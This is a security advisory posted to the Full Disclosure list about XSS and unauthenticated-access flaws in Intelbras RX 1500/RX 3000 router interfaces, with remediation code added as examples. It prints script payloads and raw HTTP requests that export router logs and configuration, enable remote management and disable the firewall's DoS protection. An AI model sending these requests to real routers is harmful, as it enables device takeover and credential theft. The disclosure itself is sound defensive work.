Message-ID: <CAPYBWVwWKe3yQ2sQsxy3-JuHboEASpEEq2u3cqasUeg0cXaAfg@mail.gmail.com>
Date: Mon, 14 Jul 2025 10:42:55 -0300
From: Gabriel Augusto Vaz de Lima via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple vulnerabilities in the web management interface of Intelbras routers
=====[Tempest Security Intelligence]==========================================
Multiple vulnerabilities in the web management interface of Intelbras routers
Author: Gabriel Lima <gabriel lima () tempest com br >
=====[Table of Contents]======================================================
1. Overview
2. Detailed description
3. Other contexts & solutions
4. Acknowledgements
5. Timeline
6. References
=====[1. Overview]============================================================
* Systems affected:
  - Intelbras web interface RX 1500 - 2.2.9 (verified) (other routers/versions may be affected)
  - Intelbras web interface RX 3000 - 1.0.11 (verified) (other routers/versions may be affected)
* Release date: 07/14/2025
* Impact: Several vulnerabilities were found that allow retrieval of
administrative session tokens and direct unauthenticated access to
sensitive features, including recovery of the router's current configuration.
Both routers use Wi-Fi 6, which delivers higher speed, better network
efficiency and less interference. The RX 1500 [1] and RX 3000 [2] are aimed
at residential customers with high-speed plans and high-performance
connections.
=====[2. Detailed description]================================================
The web management system for the RX 1500 and RX 3000 routers is designed to
help the device's administrator configure the device to their needs. During
security research on it, however, multiple vulnerabilities related to XSS and
direct unauthenticated access were found.
Two types of vulnerability were identified: Cross-Site Scripting (XSS) and
Direct Unauthenticated Access.
Regarding the XSS vulnerabilities, to illustrate their impact: an
unauthenticated attacker may gain administrative access to the system and
full control of the router, while an attacker who already has administrator
access can use them to establish persistence and maintain access.
Regarding the direct unauthenticated access vulnerabilities, the application
hosts endpoints that allow retrieval of log files and of the router's
configuration file, which stores the device's password and its current
settings. Importantly, any feature can be accessed in an unauthenticated
manner as long as an administrator is authenticated and active within the
system.
The following section dissects the XSS issues.
2.1 Possibility of injecting JavaScript code into client names (XSS) -
CVE-2025-26064
An authenticated attacker may inject persistent JavaScript through the
connected clients configuration feature (Home > Connected clients). This
problem occurs due to the lack of character handling in the "Name" field.
As proof of concept, the following payload was HTML encoded and used:
&lt;script&gt;alert(1)&lt;/script&gt;
Payload used in plain text:
<script>alert(1)</script>
The following request pinpoints the insertion of the payload:
[snippet]
POST /HNAP1/ HTTP/1.1
Host: 10.0.0.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://purenetworks.com/HNAP1/SetClientInfo"
X-Requested-With: XMLHttpRequest
Content-Length: 596
Cookie: uid=COOKIE-HERE

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetClientInfo xmlns="http://purenetworks.com/HNAP1/">
      <ClientInfoLists>
        <ClientInfo>
          <MacAddress>Client-MacAddress</MacAddress>
          <NickName>PAYLOAD-IN-HTML-ENCODE</NickName>
          <ReserveIP></ReserveIP>
          <secRouter></secRouter>
          <Type>WIFI_5G</Type>
          <COMMAND>change</COMMAND>
        </ClientInfo>
      </ClientInfoLists>
      <COMMAND></COMMAND>
    </SetClientInfo>
  </soap:Body>
</soap:Envelope>
[/snippet]
Once this request is submitted, the payload is rendered in the context of
the victim's browser.
2.2 Possibility of injecting JavaScript code into the name of the guest
network (XSS) - CVE-2025-26064
An authenticated attacker may inject persistent JavaScript through the Guest
Network functionality (Settings > Wi-Fi > Guest Network). This problem
occurs due to the lack of character handling in the "Wi-Fi network name"
field (both 2.4GHz and 5GHz).
As a proof of concept, the following payloads were HTML encoded and
inserted into each field:
2.4GHz network: &lt;script&gt;alert(1)&lt;/script&gt;
5GHz network: &lt;script&gt;alert(2)&lt;/script&gt;
Payloads used in plain text:
2.4GHz network: <script>alert(1)</script>
5GHz network: <script>alert(2)</script>
The following portrays an example of the request submitted by the attacker:
[snippet]
POST /HNAP1/ HTTP/1.1
Host: 10.0.0.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions"
X-Requested-With: XMLHttpRequest
Content-Length: 2991
Cookie: uid=COOKIE-HERE

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetMultipleActions xmlns="http://purenetworks.com/HNAP1/">
      <SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-2.4GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings>
      <SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity>
      <SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-5GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40/80</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName></ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings>
      <SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity>
      <SetGuestZoneRouterSettings xmlns="http://purenetworks.com/HNAP1/"><InternetAccessOnly>false</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings>
    </SetMultipleActions>
  </soap:Body>
</soap:Envelope>
[/snippet]
By accessing the system's home page (namely: the Status page), one can
observe the JavaScript rendering for both fields.
2.3 Possibility of multiple JavaScript code injections in the Site Survey
feature (XSS) - CVE-2025-26063
The "Site Survey" feature (Management > Site Survey) displays nearby active
Wi-Fi networks, presenting their ESSIDs among other details. However, due to
the lack of character handling, if an attacker creates a rogue Wi-Fi network
whose name contains HTML/JavaScript code (e.g. "<script>alert(1)</script>")
and the router administrator uses this feature, the malicious code is
executed as soon as the tab listing all available ESSIDs is opened.
As a proof of concept, an SSID with the following name was created:
<script>alert(1)</script>
The following portrays an example of the request made by the administrator
when starting a "Site Survey" scan:
[snippet]
POST /HNAP1/ HTTP/1.1
Host: [redacted]
SOAPAction: "http://purenetworks.com/HNAP1/igd_wifi_list_scan_start"
X-Requested-With: XMLHttpRequest
Content-Length: 357
Cookie: [redacted]

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <igd_wifi_list_scan_start xmlns="http://purenetworks.com/HNAP1/">
      <radio>2.4g</radio>
    </igd_wifi_list_scan_start>
  </soap:Body>
</soap:Envelope>
[/snippet]
The XSS fires when the administrator hovers the mouse pointer over the
network's name (highlighted in the graphic within the router's web
management interface) or opens the nearby devices section.
The following section dissects the direct unauthenticated access issues.
2.4 Incorrect Access Control - CVE-2025-26062
This section addresses three access control vulnerabilities that MITRE
considered duplicates of one another. For clarity, they are treated here as
a single topic.
2.4.1 Possibility of retrieving router logs
The router's administrative interface provides a feature (Management >
System log) that allows an authenticated entity (e.g. an administrator) to
retrieve the router's log file, which may contain potentially sensitive
debug information. However, due to the lack of permission validation, an
unauthenticated entity can download the file without ever authenticating.
The following is an example request used as proof of concept:
[snippet]
POST /cgi-bin/dllog.cgi HTTP/1.1
Host: 10.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

Export=Export
[/snippet]
As a result, a log file containing potentially sensitive information is
provided for download.
2.4.2 Possibility of recovering backups of router settings
The router's administrative interface provides a feature (Management >
System) that allows an authenticated entity (e.g. an administrator) to
retrieve the router's current configuration file, which may contain
potentially sensitive information about the environment. However, due to
the lack of permission validation, an unauthenticated entity can download
the file without ever authenticating.
The following snippet illustrates the request made to the affected endpoint
by an unauthenticated attacker retrieving the router's configuration file;
the response carries the contents of the ".cfg" file:
[snippet]
POST /cgi-bin/ExportSettings.sh HTTP/1.1
Host: 10.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

Export=Export
[/snippet]
As a result of submitting the request above, the .cfg backup file is
retrieved without any authorization having been presented.
2.4.3 Possibility of accessing various functionalities in an
unauthenticated manner
Various router features, such as editing firewall rules, configuring Wi-Fi
settings, and changing the router's security rules and policies, were found
to be accessible without authentication whenever an administrator was
logged in to the administrative interface at the moment of exploitation.
In other words, the only precondition for this unauthenticated access is
that an administrator has an active session at that moment.
The following snippet shows a request that renders the router's
administrative interface publicly accessible (i.e. reachable from the
Internet):
[snippet]
POST /HNAP1/ HTTP/1.1
Host: 10.0.0.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://purenetworks.com/HNAP1/SetAdministrationSettings"
X-Requested-With: XMLHttpRequest
Content-Length: 491

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetAdministrationSettings xmlns="http://purenetworks.com/HNAP1/">
      <HTTPS>false</HTTPS>
      <RemoteMgt>true</RemoteMgt>
      <RemoteMgtPort>8080</RemoteMgtPort>
      <RemoteMgtHTTPS>false</RemoteMgtHTTPS>
      <InboundFilter></InboundFilter>
    </SetAdministrationSettings>
  </soap:Body>
</soap:Envelope>
[/snippet]
The following snippet shows a request that disables the router's Denial of
Service (DoS) protection:
[snippet]
POST /HNAP1/ HTTP/1.1
Host: 10.0.0.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://purenetworks.com/HNAP1/SetFirewallEnableSettings"
X-Requested-With: XMLHttpRequest
Content-Length: 381

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetFirewallEnableSettings xmlns="http://purenetworks.com/HNAP1/">
      <Firewall_Enabled>false</Firewall_Enabled>
    </SetFirewallEnableSettings>
  </soap:Body>
</soap:Envelope>
[/snippet]
Other features are likewise accessible without authentication, as long as
the request is sent while an administrator is active.
Taken together, the findings in this section make several attack vectors
for obtaining administrative access feasible from the position of an
unauthenticated user. Furthermore, once authenticated as an administrator,
an attacker could use the same techniques to establish persistence.
=====[3. Other contexts & solutions]==========================================
In regard to the XSS disclosed issues, it is recommended that all
information coming from third parties (databases, other applications,
client-side, etc.) have their special characters converted to the **HTML
Entities** character set. Moreover, the data must be semantically filtered
to guarantee that it conforms to the expected format and is free of any
undesired characters.
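As an added example (not code from the advisory or from Intelbras), the following Python models the server-side handling recommended above for the "Name" and "Wi-Fi network name" fields of sections 2.1 and 2.2: the HNAP body is parsed, the value is semantically filtered against an allowlist, and every value is converted to HTML entities on output. The sample body, MAC address and allowlist pattern are constructed assumptions, not the firmware's real limits.

```python
import html
import re
import xml.etree.ElementTree as ET

HNAP = "{http://purenetworks.com/HNAP1/}"

# Constructed SetClientInfo body modelled on section 2.1. The payload is
# XML-escaped because that is the only way it can travel inside a SOAP body;
# the MAC address is a made-up sample value.
SAMPLE_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soap:Body><SetClientInfo xmlns="http://purenetworks.com/HNAP1/">'
    '<ClientInfoLists><ClientInfo><MacAddress>00:11:22:33:44:55</MacAddress>'
    '<NickName>&lt;script&gt;alert(1)&lt;/script&gt;</NickName>'
    '<Type>WIFI_5G</Type><COMMAND>change</COMMAND></ClientInfo>'
    '</ClientInfoLists></SetClientInfo></soap:Body></soap:Envelope>'
)

# Hypothetical allowlist for a client nickname; the firmware's real limits
# are not published in the advisory.
NICKNAME_RE = re.compile(r"[A-Za-z0-9 ._-]{1,32}")


def extract_text_fields(body, tags=("NickName", "SSID")):
    """Return the user-controlled strings from an HNAP request body.
    The XML parser undoes the &lt;/&gt; escaping, so what the firmware
    stores is raw HTML: XML escaping on the way in is no XSS defence."""
    wanted = {HNAP + t: t for t in tags}
    root = ET.fromstring(body.encode("utf-8"))
    return {wanted[el.tag]: (el.text or "") for el in root.iter() if el.tag in wanted}


def semantic_filter(value):
    """Input validation: accept only the expected nickname format."""
    return NICKNAME_RE.fullmatch(value) is not None


def render_cell(value):
    """Output encoding: convert HTML special characters to entities before
    the value is placed in the Status page. This is the fix section 3 asks for."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


def process_set_client_info(body):
    """Server-side handling of SetClientInfo: validate, then always encode
    on output. Encoding is applied even to rejected values so that legacy
    or imported data can never be rendered raw."""
    name = extract_text_fields(body).get("NickName", "")
    return {
        "accepted": semantic_filter(name),
        "stored": name,
        "rendered": render_cell(name),
    }
```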
In regard to the unauthenticated access disclosed issues, it is strongly
recommended that changes be made to the application's existing session
management and access control, such that access to sensitive
functionalities is available only to authenticated users, and that these
users perform only actions permitted by their authorization profile.
Moreover, it is important to highlight that all logic that determines
whether a user has the necessary permissions to perform a certain action
must execute **exclusively on the server-side**.
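As an added example (not the firmware's code), the following Python models the server-side session check that section 2.4 shows to be missing: authorize_flawed reproduces the behaviour described there (the CGI exports need no session at all, and HNAP actions only need some administrator to be active), while authorize_fixed binds authorization to the requester's own uid cookie. The endpoint paths and SOAP action names come from the advisory; the session store, its timeout and the Request model are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass

# Endpoints and HNAP actions named in section 2.4 of the advisory.
PROTECTED_CGI = {"/cgi-bin/dllog.cgi", "/cgi-bin/ExportSettings.sh"}
PROTECTED_ACTIONS = {"SetAdministrationSettings", "SetFirewallEnableSettings",
                     "SetClientInfo", "SetMultipleActions"}


@dataclass
class Request:
    path: str
    soap_action: str = ""   # last path segment of the SOAPAction header
    cookie_uid: str = ""    # value of the uid cookie, "" when absent


class SessionStore:
    """Hypothetical server-side session table keyed by the uid cookie value."""

    def __init__(self, ttl=600):
        self._live = {}          # uid -> login time (seconds)
        self.ttl = ttl

    def login(self, now):
        uid = secrets.token_urlsafe(32)
        self._live[uid] = now
        return uid

    def any_active(self, now):
        return any(now - t < self.ttl for t in self._live.values())

    def owns_session(self, uid, now):
        # Constant-time comparison against each live uid so that a guessed
        # cookie cannot be refined byte by byte from timing differences.
        return any(hmac.compare_digest(stored, uid) and now - t < self.ttl
                   for stored, t in self._live.items())


def authorize_flawed(req, store, now):
    """Models the behaviour the advisory describes: exports need no session,
    and HNAP actions succeed whenever *some* administrator is logged in."""
    if req.path in PROTECTED_CGI:
        return True
    if req.soap_action in PROTECTED_ACTIONS:
        return store.any_active(now)
    return True


def authorize_fixed(req, store, now):
    """Every sensitive request must carry a uid cookie that maps to a live
    session of its own; whether another administrator is active is irrelevant."""
    sensitive = req.path in PROTECTED_CGI or req.soap_action in PROTECTED_ACTIONS
    if not sensitive:
        return True
    return bool(req.cookie_uid) and store.owns_session(req.cookie_uid, now)
```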
=====[4. Acknowledgements]====================================================
- Joaquim Brasil de Oliveira < joaquim brasil () tempest com br >
- Tempest Security Intelligence[3]
=====[5. Timeline]============================================================
07/15/2024 - We contacted the manufacturer reporting an XSS vulnerability in the Site Survey functionality;
07/16/2024 - The vendor requested contact information;
07/17/2024 - Contact information was sent to the vendor;
07/17/2024 - The vendor began the process of validating and acknowledging the first bug reported;
07/22/2024 - A full report was sent with all the other discovered vulnerabilities;
07/25/2024 - The vendor acknowledged all the vulnerabilities reported in the RX 1500 and RX 3000 devices;
09/19/2024 - The vendor released the beta version of the corrected firmware 2.2.12;
09/23/2024 - All points were retested and confirmed fixed;
01/27/2025 - CVE IDs requested from MITRE;
02/24/2025 - MITRE sent the CVE IDs;
07/14/2025 - Publication date.
=====[6. References]==========================================================
[1] https://www.intelbras.com/pt-br/roteador-wi-fi-6-dual-band-rx-1500
[2] http://intelbras.com/pt-br/roteador-wireless-rx-3000
[3] https://tempest.com.br
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/